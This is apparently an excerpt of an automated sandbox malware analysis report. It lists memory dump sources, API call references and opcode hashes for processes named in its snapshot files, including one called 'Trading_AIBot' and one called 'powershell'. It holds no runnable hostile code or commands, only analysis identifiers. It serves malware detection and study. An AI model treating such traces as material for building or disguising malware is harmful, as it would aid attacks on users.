                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2396597881.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396561892.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396630294.000000000041B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396656156.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396683576.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396683576.000000000044C000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396798482.000000000055F000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_400000_Native_neworigin.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Interlocked$DecrementIncrement$___addlocaleref___free_lc_time___free_lconv_mon___free_lconv_num___freetlocinfo___removelocaleref
                                                                                                                                                                                                                                                                                                                                  • String ID: @.B
                                                                                                                                                                                                                                                                                                                                  • API String ID: 467427115-470711618
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 3857329619949c293296419ec2be8f51648e9d3bf58d3a63f1cc8ec60b1035b6
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 8e9b8205a585dc9325c25650a27042e0212317e7447dcce9b0fe23aa5a8dd77f
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3857329619949c293296419ec2be8f51648e9d3bf58d3a63f1cc8ec60b1035b6
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BDE0863250192255CE35261D76806EF93A98FD3725B3A017FF864AF7D8EB2C4CC0809D
APIs
• lstrlenA.KERNEL32(?), ref: 00401906
• MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 0040192F
• GetLastError.KERNEL32 ref: 00401940
• MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401958
• MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401980
Memory Dump Source
• Source File: 00000009.00000002.2396597881.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_Native_neworigin.jbxd
Similarity
• API ID: ByteCharMultiWide$ErrorLastlstrlen
• String ID:
• API String ID: 3322701435-0
APIs
• __fileno.LIBCMT ref: 0040C77C
• __locking.LIBCMT ref: 0040C791
  • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
  • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
Memory Dump Source
• Source File: 00000009.00000002.2396597881.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_Native_neworigin.jbxd
Similarity
• API ID: __decode_pointer__fileno__getptd_noexit__locking
• String ID:
• API String ID: 2395185920-0
APIs
Memory Dump Source
• Source File: 00000009.00000002.2396597881.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_Native_neworigin.jbxd
Similarity
• API ID: _fseek_malloc_memset
• String ID:
• API String ID: 208892515-0
APIs
• __flush.LIBCMT ref: 0040BB6E
• __fileno.LIBCMT ref: 0040BB8E
• __locking.LIBCMT ref: 0040BB95
• __flsbuf.LIBCMT ref: 0040BBC0
  • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
  • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
Memory Dump Source
• Source File: 00000009.00000002.2396597881.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_Native_neworigin.jbxd
Similarity
• API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
• String ID:
• API String ID: 3240763771-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 72eaa501f89e5d914343e0f007c81726c853b1270fdaa85e4c7363b387074608
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B441A331A006059BDF249F6A88855AFB7B5EF80320F24853EE465B76C4D778EE41CB8C
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000100,?,00000000,?,?,00000000), ref: 0086354C
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 008635D5
• GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 008635E7
• __freea.LIBCMT ref: 008635F0
  • Part of subcall function 008632FA: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 0086332C
Memory Dump Source
• Source File: 00000009.00000002.2396960520.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false
APIs
• _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004152D3
• __isleadbyte_l.LIBCMT ref: 00415307
• MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 00415338
• MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 004153A6
Memory Dump Source
• Source File: 00000009.00000002.2396597881.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
APIs
• LoadLibraryExW.KERNEL32(00000000,00000000,00000800,008615D8,00000000,00000000,?,00862132,008615D8,00000000,00000000,00000000,?,00862283,00000006,FlsSetValue), ref: 008621BD
• GetLastError.KERNEL32(?,00862132,008615D8,00000000,00000000,00000000,?,00862283,00000006,FlsSetValue,00876FC4,FlsSetValue,00000000,00000364,?,0086192D), ref: 008621C9
• LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00862132,008615D8,00000000,00000000,00000000,?,00862283,00000006,FlsSetValue,00876FC4,FlsSetValue,00000000), ref: 008621D7
Memory Dump Source
• Source File: 00000009.00000002.2396960520.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false
Memory Dump Source
• Source File: 00000009.00000002.2396597881.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2796892978.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1030000_Trading_AIBot.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 40b01172e65b1f2956efe0ceb9b84c4763a383d69eff9ab0f65797ff0ab065a5
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 42a4d988648b99a4191edc29c3ff5494ddad6cd89a069500a31f75257925340b
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 40b01172e65b1f2956efe0ceb9b84c4763a383d69eff9ab0f65797ff0ab065a5
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A671D074D00219CFCB14EFA4D980AADBBB6FF89300F208569D4497B264DB356E8ACF50
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2796892978.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1030000_Trading_AIBot.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 32652d004a3711884d6e1c4da01fa8cfe7826a1227d85f82a66a1f53939b036a
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 198f951f7d66f568c69d6ce8211b1ad25fd9c4311c99b6996a00d0b4321a1960
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 32652d004a3711884d6e1c4da01fa8cfe7826a1227d85f82a66a1f53939b036a
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9561D074D00219CFCB14EFA4D990AADBBB6FF89300F208569D449BB264DB356D8ACF50
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2796892978.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1030000_Trading_AIBot.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: dbef7fc1086ed44d88541dedc672272a62b85835ba308996bda869564b235258
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: c3d9bdbe3922428bfc4af06b5574b3cdae414fbc4294fac5dfca04d46e8581e8
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dbef7fc1086ed44d88541dedc672272a62b85835ba308996bda869564b235258
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5661C378A00248CFCB44DFA9D594A9DBBF2FF89710F109069E909AB365DB31AC06CF14
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2796892978.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1030000_Trading_AIBot.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: af2579fe7a85805a119694b6fdab2ce8575e891b14f0aca9f54411c698d8cbde
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 490a99498fd8c2cf5bce7876e3974bf6b7c0266b1a01ce47fde030e9af7983e9
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: af2579fe7a85805a119694b6fdab2ce8575e891b14f0aca9f54411c698d8cbde
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D441C9B4D00248DFDB14DFAAC884ADEFFB9BF89300F24802AE458AB254D7349946CF54
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2796892978.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1030000_Trading_AIBot.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: e35a21c10e61b864f68fe8ec3343b7df65a4b9dd4144ff61cd475507e281737a
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: c55ce54514d9b083caffcf4ea6f3f43a2153b6695fcfaece880bd73ac665e5bb
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e35a21c10e61b864f68fe8ec3343b7df65a4b9dd4144ff61cd475507e281737a
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1941CAB4D00248DFDB14DFAAC884A9EFFF9BF89300F14802AE458AB254D7349846CF54
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2796892978.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1030000_Trading_AIBot.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID: Jdq
                                                                                                                                                                                                                                                                                                                                  • API String ID: 0-1891755625
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 7af843cf84b3da21468bb046d840b70c9b7a652d4eb5121bb8c4543e7d463fe4
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: cf90cc8acfe546041191fa94b30704f41fa89f7dd510482ace49c85d89ef5a81
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7af843cf84b3da21468bb046d840b70c9b7a652d4eb5121bb8c4543e7d463fe4
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1241D475E402089FDB04DFA9D994AEEBBF2FF89301F108069E515B72A0DB359905CF90
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2796892978.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1030000_Trading_AIBot.jbxd
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 68abf5d8f7247810f4d480044fb4787665a305a0d5258dd440cff32a29488052
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: d6da8b15a1f6f6e80e2d0182692ff1ce8b17181a3bc2e057842ac87f865832a0
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 68abf5d8f7247810f4d480044fb4787665a305a0d5258dd440cff32a29488052
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8641ACB1D00248DFDB14DFEAD584ADEBFF9AF88300F14842AE459AB254D7746885CF50
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2796892978.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1030000_Trading_AIBot.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: e8ba09155e01f73a599af9ac6915ca47b6bee668f2c40484f35526dd3b006184
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: b8d41139f10657d2c0a6595110035924ba0bff86b123ec6446bf12280105d7c1
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e8ba09155e01f73a599af9ac6915ca47b6bee668f2c40484f35526dd3b006184
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C331E474E052098FCB04DFB4D451AEEBBB2EF89304F1094AAD455B73A0DB365D42CBA5
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2796892978.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1030000_Trading_AIBot.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 58008d7713a78849ed8ef943af92b47355f598c4048f26ce9e750292def07696
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 4432ca65b4b67c2e3aca4755af0b2617bc2cd07f5d24c978cdcd6d975c8da9dd
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 58008d7713a78849ed8ef943af92b47355f598c4048f26ce9e750292def07696
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3421C074E002098FCB08DBB5D450AEEB7B2EF89300F109469D455B7390DB366D41CBA5
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2796892978.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1030000_Trading_AIBot.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 73201b983c81670b65201b4b3dc17382e259ad0feafbc3f5be3951d40e3c3980
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 71754ee3e2cdc57218364d4f7acc63aa755a7bbdb41f59717b92bc48e0f2889e
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 73201b983c81670b65201b4b3dc17382e259ad0feafbc3f5be3951d40e3c3980
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D911E076C0D3868FD7058B70D9193ADBFB0EF43301F09089AD096A31A3DB384606CB62
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2796892978.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1030000_Trading_AIBot.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 0c74bd5992605848cb0cba7556fcc2ee65e1a99d34c35e9fb2dd56b4726e4e8f
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 9ea10bbbf487dd74eed98f626088ae8f0ac2915dc460ca732089f94c63d732a3
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0c74bd5992605848cb0cba7556fcc2ee65e1a99d34c35e9fb2dd56b4726e4e8f
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 46015E70C0021ADFDB04EFB9C5187AEBFF0EB46302F0098A99416A32A0DB784644CF50
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2796892978.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1030000_Trading_AIBot.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 22ea0d4331c278669c43534acd1321dd37265dba01ae85fed626fedfa564a0c7
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 8757e9ab7239b66a53bee4e12e5289be105835ee45fb04199b6ac442bcea5923
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 22ea0d4331c278669c43534acd1321dd37265dba01ae85fed626fedfa564a0c7
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E5011A70C4521ADFDB44EFB9C5197AEBFF0EB46306F0098A99416A32A1DB784644CF91
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2796892978.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1030000_Trading_AIBot.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 93f224edd75fd5a9b80bfd5f6f06643728282c8c42b59674ac69ea37dc8f1300
• Instruction ID: 8fd5c804f02f929036ec3dffcb5e12d47558bd8489c5bfd89e25fd6ee12689af
• Opcode Fuzzy Hash: 93f224edd75fd5a9b80bfd5f6f06643728282c8c42b59674ac69ea37dc8f1300
• Instruction Fuzzy Hash: 74F08C79D00156CFCB64DFB8D4487BCBBB0EF4A302F0060A6D009A7220CB309A86CF14
Memory Dump Source
• Source File: 0000000A.00000002.2796892978.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_1030000_Trading_AIBot.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d9bbf3025362048592be606977634916d6f6fc6fd2443c9a7d45a334488931a5
• Instruction ID: b8bac4f45d07984d550df80418ea0f1513640ea10de665e463ed39e1c26f0d21
• Opcode Fuzzy Hash: d9bbf3025362048592be606977634916d6f6fc6fd2443c9a7d45a334488931a5
• Instruction Fuzzy Hash: F5F092B8915104DFC744EF68E984958BFB0FB49322F1042A8E809973A0EB309D46CB40
Memory Dump Source
• Source File: 0000000A.00000002.2796892978.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_1030000_Trading_AIBot.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3be5adaeceb91cd0c1e7609b94c0a401d3d40b5ac8b1c395653fba5f8b877ca8
• Instruction ID: 9054d8354807ea1dcc3818980dd7ff08a13aa2992ffd324ee8303cc087c82520
• Opcode Fuzzy Hash: 3be5adaeceb91cd0c1e7609b94c0a401d3d40b5ac8b1c395653fba5f8b877ca8
• Instruction Fuzzy Hash: 91E022B094A148EFCB01DFB8E60569DBFB5EB01301F0085FAD809A3251EB3A0F16C781
Memory Dump Source
• Source File: 0000000A.00000002.2796892978.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_1030000_Trading_AIBot.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 499ff3348c78e8aede7628a38fbfd38ffa70004ab467a54000b4d9778bd97a0d
• Instruction ID: 027178ce26e414ce586f2dbfc654e10c7c6d8d9f47cc8d0b7a6dd36bd0d0f0a5
• Opcode Fuzzy Hash: 499ff3348c78e8aede7628a38fbfd38ffa70004ab467a54000b4d9778bd97a0d
• Instruction Fuzzy Hash: 54E0DFB8911208DFC344EF78E988A59BFF0FB48312F1041E8D80897360EB30AD41CB80
Memory Dump Source
• Source File: 0000000A.00000002.2796892978.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_1030000_Trading_AIBot.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 303a594bd93f79c3d654ca0d858c6755030f057412b2c51150b19ac9330a7dbc
• Instruction ID: a564580d9327426acdc0ea006776542419b979ca97264d1595e2413fe6500d3e
• Opcode Fuzzy Hash: 303a594bd93f79c3d654ca0d858c6755030f057412b2c51150b19ac9330a7dbc
• Instruction Fuzzy Hash: 5DD02EF1805104ABDA108FE9B801A683F2CD3C2233F0002A4F09C52282E7720213C391
Memory Dump Source
• Source File: 0000000A.00000002.2796892978.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_1030000_Trading_AIBot.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 86877cebab9ddfa207fb5cfa3d9f2c9b75fd33a69dbf6815f44ef46c301a0e3c
• Instruction ID: 650ae155001c3639b1f0b5b395a49673f594a9dde37e459fd50bcf1eba3af563
• Opcode Fuzzy Hash: 86877cebab9ddfa207fb5cfa3d9f2c9b75fd33a69dbf6815f44ef46c301a0e3c
• Instruction Fuzzy Hash: 76E08670511108EFD701EFB8E605A9DB7F9EB44305F4085A9E409A3255EB365F14D780
Memory Dump Source
• Source File: 0000000A.00000002.2796892978.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_1030000_Trading_AIBot.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 925b18ae985623466fb59906d05e01b7c2c3da5336f35258ee9e5cc69822dd63
• Instruction ID: ed1dca16c61b39d0d82dedd815a5ddc1f97f28189a4c628e2e5eeab245fd7261
• Opcode Fuzzy Hash: 925b18ae985623466fb59906d05e01b7c2c3da5336f35258ee9e5cc69822dd63
• Instruction Fuzzy Hash: 77D0A770C05245DBC355EBA4A60E769BB6CDB02216F44009DD44426111FB758691C7DA
Memory Dump Source
• Source File: 0000000A.00000002.2796892978.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_1030000_Trading_AIBot.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 09c41ed580f58824cca4443030915ef9edf5fd506faf4de9c84dc49438a3f3ed
• Instruction ID: 8e3538d5ad1e38ec8811a0cafb3df3a251dfe9b0ae3851e9a05f1b89d29294af
• Opcode Fuzzy Hash: 09c41ed580f58824cca4443030915ef9edf5fd506faf4de9c84dc49438a3f3ed
• Instruction Fuzzy Hash: E7C080B08152089FD310DFF9E8047557F7CE742323F400198E54853210DB714550C795
Memory Dump Source
• Source File: 0000000A.00000002.2796892978.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_1030000_Trading_AIBot.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 37f4fc029d46e4115a93942b4a6c138b4791a945ad8b6de414c5352512fe182c
• Instruction ID: 6b46fa72ba1b97ec5d7192d4d2346feaa7e32a96eabbbaeae41f256b1bc5d203
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 37f4fc029d46e4115a93942b4a6c138b4791a945ad8b6de414c5352512fe182c
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ECC08070C552099FC314DFA9E408B55BB7CDB02313F4001A8E50853115EB724550C7A6
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2502276903.0000000004FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_4fd0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
